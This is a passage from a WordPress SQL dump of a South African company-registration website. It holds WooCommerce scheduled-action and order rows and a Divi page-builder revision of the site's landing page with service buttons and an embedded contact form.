06:15:25','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33206',0,'scheduled-action','',3),(33208,0,'2019-08-24 07:15:25','2019-08-24 07:15:25','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d60e48220bc28.31096238-uWMplEKZpWpj8Nff1QZkee3il1WK76bn','','','2019-08-24 09:17:22','2019-08-24 07:17:22','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33208',0,'scheduled-action','',3),(33210,0,'2019-08-24 08:17:22','2019-08-24 08:17:22','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d60f2bfe5e991.41372987-bGTrG6OAdKpNj5zFaN1eLsCFuu8E63F0','','','2019-08-24 10:18:07','2019-08-24 08:18:07','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33210',1,'scheduled-action','',3),(33212,0,'2019-08-24 09:18:07','2019-08-24 09:18:07','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d610125a6cba0.78756916-Ic8UJDP3kqmCE6ESZlVSNDclDbC2puSk','','','2019-08-24 11:19:33','2019-08-24 09:19:33','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33212',0,'scheduled-action','',3),(33214,0,'2019-08-24 10:19:33','2019-08-24 10:19:33','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d6110978d9dc5.57407518-6DXtBS0pYUg9EpFb95ppGeK5y8kuOSmU','','','2019-08-24 12:25:27','2019-08-24 10:25:27','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33214',0,'scheduled-action','',3),(33216,0,'2019-08-24 11:25:27','2019-08-24 11:25:27','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d611f8d704455.00605509-BABW6yGFIBe0qiYSUImbpCZjiB523WFb','','','2019-08-24 13:29:17','2019-08-24 11:29:17','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33216',0,'scheduled-action','',3),(33218,0,'2019-08-24 12:29:17','2019-08-24 12:29:17','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d612e11cf2f55.99099246-pE2377xnmtLjqS7BRkP2YVcVK7KqhMzf','','','2019-08-24 14:31:13','2019-08-24 12:31:13','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33218',0,'scheduled-action','',3),(33143,3,'2019-08-22 16:19:54','2019-08-22 14:19:54','[et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\" fb_built=\"1\" _i=\"0\" _address=\"0\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0.0\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\" _i=\"1\" _address=\"0.0.0.1\"]<h1 style=\"text-align: center;\">What Would You Like To Do ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\" _i=\"1\" _address=\"0.0.1\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.27.3\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"3%\" animation_speed_curve=\"ease-in\" _i=\"0\" _address=\"0.0.1.0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"-26px|223px||427px||\" _i=\"1\" _address=\"0.1\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.1.0\"][et_pb_cta title=\"Register A Company\" button_url=\"https://companyregistration.online/company-registrations/\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.27.3\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|10px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on|hover\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on|hover\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" background__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#ffffff\" _i=\"0\" _address=\"0.1.0.0\" button_bg_color__hover=\"#0c71c3\" button_bg_enable_color__hover=\"on\" button_text_color__hover=\"#ffffff\"][/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/company-registrations/\" button_text=\"Register A Company\" button_alignment=\"center\" _builder_version=\"3.27.3\" hover_enabled=\"0\" _i=\"1\" _address=\"0.1.0.1\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"1\" _address=\"0.1.1\"][et_pb_cta title=\"Maintain My Company\" button_url=\"https://companyregistration.online/maintaining-your-company/\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.27.3\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|10px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" _i=\"0\" _address=\"0.1.1.0\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/maintaining-your-company/\" button_text=\"Maintain My Company\" button_alignment=\"center\" _builder_version=\"3.27.3\" hover_enabled=\"0\" _i=\"1\" _address=\"0.1.1.1\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"2\" _address=\"0.1.2\"][et_pb_cta title=\"Register For Tax\" button_url=\"https://companyregistration.online/tax-registrations\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.27.3\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|10px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" _i=\"0\" _address=\"0.1.2.0\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/tax-registrations\" button_text=\"Register For Tax\" button_alignment=\"center\" _builder_version=\"3.27.3\" hover_enabled=\"0\" _i=\"1\" _address=\"0.1.2.1\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"3\" _address=\"0.1.3\"][et_pb_cta title=\"Combo Deals\" button_url=\"https://companyregistration.online/combo-deals-2\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.27.3\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|10px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/combo-deals-2\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" _i=\"0\" _address=\"0.1.3.0\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/combo-deals-2\" button_text=\"Combo Deals\" button_alignment=\"center\" _builder_version=\"3.27.3\" hover_enabled=\"0\" _i=\"1\" _address=\"0.1.3.1\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" fb_built=\"1\" _i=\"1\" _address=\"1\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" _i=\"0\" _address=\"1.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"Encode Sans Semi Condensed||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Encode Sans Semi Condensed|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"1.0.0.0\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.27.3\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"6%\" always_center_on_mobile=\"off\" _i=\"1\" _address=\"1.0.0.1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.0.1\"][et_pb_text _builder_version=\"3.26.6\" _i=\"0\" _address=\"1.0.1.0\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"2.0.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\" _i=\"0\" _address=\"2.0.0.0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"2.0.1\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\" _i=\"0\" _address=\"2.0.1.0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\" fb_built=\"1\" _i=\"3\" _address=\"3\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\" _i=\"0\" _address=\"3.0\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"3.0.0\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\" _i=\"0\" _address=\"3.0.0.0\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" _i=\"0\" _address=\"3.0.0.0.0\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"1\" _address=\"3.0.0.0.1\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"2\" _address=\"3.0.0.0.2\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"3\" _address=\"3.0.0.0.3\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"4\" _address=\"3.0.0.0.4\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"5\" _address=\"3.0.0.0.5\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-22 16:19:54','2019-08-22 14:19:54','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(33224,0,'2019-08-24 12:38:34','2019-08-24 12:38:34','{\"webhook_id\":5,\"arg\":1}','woocommerce_deliver_webhook_async','','publish','open','closed','','scheduled-action-5d613001d0d148.19812628-MG3RC3neuCNwr3UhaoK9pyp9qASIJGB4','','','2019-08-24 14:39:29','2019-08-24 12:39:29','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33224',0,'scheduled-action','',3),(33225,1,'2019-08-24 14:38:34','2019-08-24 12:38:34','','Order &ndash; August 24, 2019 @ 02:38 PM','','wc-cancelled','open','closed','wc_order_zi9ikSXHc9iPC','order-aug-24-2019-1238-pm','','','2019-08-24 14:39:00','2019-08-24 12:39:00','',0,'https://companyregistration.online/?post_type=shop_order&#038;p=33225',0,'shop_order','',1),(33226,0,'2019-08-24 12:38:39','2019-08-24 12:38:39','[33225]','wc-admin_import_order','','publish','open','closed','','scheduled-action-5d6130039e7e23.97195574-nuWEx6XEHCesxg95tomvLH06aWXV61g8','','','2019-08-24 14:39:31','2019-08-24 12:39:31','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33226',30,'scheduled-action','',3),(33227,0,'2019-08-24 12:38:34','2019-08-24 12:38:34','{\"webhook_id\":3,\"arg\":33225}','woocommerce_deliver_webhook_async','','publish','open','closed','','scheduled-action-5d61300391de15.93905148-lJNygwdySIdvmxC0rwIC44u8p4ze4rVs','','','2019-08-24 14:39:31','2019-08-24 12:39:31','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33227',0,'scheduled-action','',3),(33228,0,'2019-08-24 12:39:00','2019-08-24 12:39:00','{\"webhook_id\":2,\"arg\":33225}','woocommerce_deliver_webhook_async','','publish','open','closed','','scheduled-action-5d613003c4f624.61927068-DRADtHQ56sozRiOTkBronJiERDBQNuRS','','','2019-08-24 14:39:31','2019-08-24 12:39:31','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33228',0,'scheduled-action','',3),(33232,0,'2019-08-24 13:11:03','2019-08-24 13:11:03','{\"webhook_id\":3,\"arg\":33230}','woocommerce_deliver_webhook_async','','publish','open','closed','','scheduled-action-5d61377b98cae9.15601202-KqddJsVlSAhBGvYiYTBcznrliElMeE5c','','','2019-08-24 15:11:23','2019-08-24 13:11:23','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33232',0,'scheduled-action','',3),(33233,0,'2019-08-24 13:11:27','2019-08-24 13:11:27','[33230]','wc-admin_import_order','','publish','open','closed','','scheduled-action-5d6137bdb75c85.92638579-rZT0n1a6jW0ksRvcYk9ndH6Sj6HTxaQa','','','2019-08-24 15:12:29','2019-08-24 13:12:29','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33233',30,'scheduled-action','',3),(33234,0,'2019-08-24 13:11:22','2019-08-24 13:11:22','{\"webhook_id\":2,\"arg\":33230}','woocommerce_deliver_webhook_async','','publish','open','closed','','scheduled-action-5d61377be75091.13935525-CyRpy3Eo5IB8TUSbJHaRb0KLz2ZvVdbo','','','2019-08-24 15:11:23','2019-08-24 13:11:23','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33234',0,'scheduled-action','',3),(33235,0,'2019-08-24 13:31:07','2019-08-24 13:31:07','{\"webhook_id\":5,\"arg\":1}','woocommerce_deliver_webhook_async','','publish','open','closed','','scheduled-action-5d613c2f154467.62887069-CSGvi6pY6MKPukvkRrDrWcu21T3EYGUy','','','2019-08-24 15:31:27','2019-08-24 13:31:27','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33235',0,'scheduled-action','',3),(33236,1,'2019-08-24 15:31:07','2019-08-24 13:31:07','','Order &ndash; August 24, 2019 @ 03:31 PM','','wc-cancelled','open','closed','wc_order_Wvd7kAD6NmmLc','order-aug-24-2019-0131-pm','','','2019-08-24 15:31:25','2019-08-24 13:31:25','',0,'https://companyregistration.online/?post_type=shop_order&#038;p=33236',0,'shop_order','',1),(33237,0,'2019-08-24 13:31:12','2019-08-24 13:31:12','[33236]','wc-admin_import_order','','publish','open','closed','','scheduled-action-5d613c2f593537.94564796-9EbsYtfnStJ1DC4acHK2PA1q4ct4YoLk','','','2019-08-24 15:31:27','2019-08-24 13:31:27','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33237',30,'scheduled-action','',3),(33238,0,'2019-08-24 13:31:07','2019-08-24 13:31:07','{\"webhook_id\":3,\"arg\":33236}','woocommerce_deliver_webhook_async','','publish','open','closed','','scheduled-action-5d613c2f4ef396.86587599-MW4rxJkt1IXyLm0Lk0yKRR9F2naslZQ0','','','2019-08-24 15:31:27','2019-08-24 13:31:27','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33238',0,'scheduled-action','',3),(33240,0,'2019-08-24 14:31:27','2019-08-24 14:31:27','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d614a96d008c6.86375854-mXvUu2EoqRFmSfjE4w8pdyaZ2aS7pPxH','','','2019-08-24 16:32:54','2019-08-24 14:32:54','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33240',0,'scheduled-action','',3),(33241,0,'2019-08-24 14:31:27','2019-08-24 14:31:27','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d614a96e22866.11680103-gtZDDjc22YskUhVldpcbcRsBeudaPmIW','','','2019-08-24 16:32:54','2019-08-24 14:32:54','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33241',0,'scheduled-action','',3),(33245,0,'2019-08-24 16:33:05','2019-08-24 16:33:05','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d6166cb1a6b07.12861784-kZBFOcUnO73UomryYlcPgfakqdAWoCeZ','','','2019-08-24 18:33:15','2019-08-24 16:33:15','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33245',0,'scheduled-action','',3),(33247,0,'2019-08-24 17:33:15','2019-08-24 17:33:15','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d617cbb3d9909.18057268-Pjcy3RToSLPshXsu4Zm7fiwSVBvhZqDE','','','2019-08-24 20:06:51','2019-08-24 18:06:51','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33247',1,'scheduled-action','',3),(33249,0,'2019-08-24 19:06:51','2019-08-24 19:06:51','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d61a3be39f5f6.69614492-nyvfDKS51JxjejvaJ12b6vbAv7xPoRsq','','','2019-08-24 22:53:18','2019-08-24 20:53:18','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33249',1,'scheduled-action','',3),(33251,0,'2019-08-24 21:53:18','2019-08-24 21:53:18','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d61b39926b006.30036841-wvif6BjQvbA5ntC8Hc5eoExM6FJyCsRD','','','2019-08-25 00:00:57','2019-08-24 22:00:57','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33251',0,'scheduled-action','',3),(33253,0,'2019-08-24 